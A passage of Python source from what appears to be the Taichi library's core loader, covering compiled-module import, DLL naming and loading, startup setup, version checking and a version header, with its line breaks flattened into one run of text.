os.path.join(get_output_directory(), 'tmp', get_unique_task_id()) lib_dir = os.path.join(get_repo_directory(), 'external', 'lib') os.environ['PATH'] += ';' + lib_dir os.makedirs(folder) shutil.copy(dll_path, os.path.join(folder, 'taichi_core.pyd')) os.environ['PATH'] += ';' + folder sys.path.append(folder) else: shutil.copy(dll_path, os.path.join(bin_dir, 'taichi_core.pyd')) sys.path.append(bin_dir) try: import taichi_core as ti_core except Exception as e: print(e) print() print( 'Hint: please make sure the major and minor versions of the Python executable is correct.' ) print() raise e os.chdir(old_wd) log_level = os.environ.get('TI_LOG_LEVEL', '') if log_level: ti_core.set_logging_level(log_level) def get_dll_name(name): if get_os_name() == 'linux': return 'libtaichi_%s.so' % name elif get_os_name() == 'osx': return 'libtaichi_%s.dylib' % name elif get_os_name() == 'win': return 'taichi_%s.dll' % name else: raise Exception(f"Unknown OS: {get_os_name()}") def load_module(name, verbose=True): if verbose: print('Loading module', name) try: if get_os_name() == 'osx': mode = ctypes.RTLD_LOCAL else: mode = ctypes.RTLD_GLOBAL if '.so' in name: ctypes.PyDLL(name, mode=mode) else: ctypes.PyDLL(os.path.join(get_repo_directory(), 'build', get_dll_name(name)), mode=mode) except Exception as e: print(Fore.YELLOW + "Warning: module [{}] loading failed: {}".format(name, e) + Style.RESET_ALL) def at_startup(): if not is_release(): output_dir = get_output_directory() if not os.path.exists(output_dir): print('Making output directory') os.mkdir(output_dir) ti_core.set_core_state_python_imported(True) record_file = os.environ.get('TI_ACTION_RECORD') if record_file: ti_core.start_recording(record_file) def start_memory_monitoring(output_fn, pid=-1, interval=1): # removing dependency on psutil return import os, psutil, time if pid == -1: pid = os.getpid() import multiprocessing def task(): with open(output_fn, 'w') as f: process = psutil.Process(pid) while True: try: mem = process.memory_info().rss except: mem = -1 time.sleep(interval) print(time.time(), mem, file=f) f.flush() proc = multiprocessing.Process(target=task, daemon=True) proc.start() def require_version(major, minor=None, patch=None): versions = [ int(ti_core.get_version_major()), int(ti_core.get_version_minor()), int(ti_core.get_version_patch()), ] match = major == versions[0] and ( minor < versions[1] or minor == versions[1] and patch <= versions[2]) if match: return else: print("Taichi version mismatch. required >= {}.{}.{}".format( major, minor, patch)) print("Installed =", ti_core.get_version_string()) raise Exception("Taichi version mismatch") at_startup() def _print_taichi_header(): dev_mode = not is_release() header = '[Taichi] ' if dev_mode: header += '<dev mode>, ' else: header += f'version {ti_core.get_version_string()}, ' llvm_version = ti_core.get_llvm_version_string() header += f'llvm {llvm_version}, ' commit_hash = ti_core.get_commit_hash() commit_hash = commit_hash[:8] header += f'commit {commit_hash}, ' header += f'{get_os_name()}, ' py_ver = '.'.join(str(x) for x in sys.version_info[:3]) header += f'python {py_ver}' print(header) _print_taichi_header() __all__ = [ 'ti_core', 'build', 'load_module', 'start_memory_monitoring', 'is_release', 'package_root', 'require_version', ]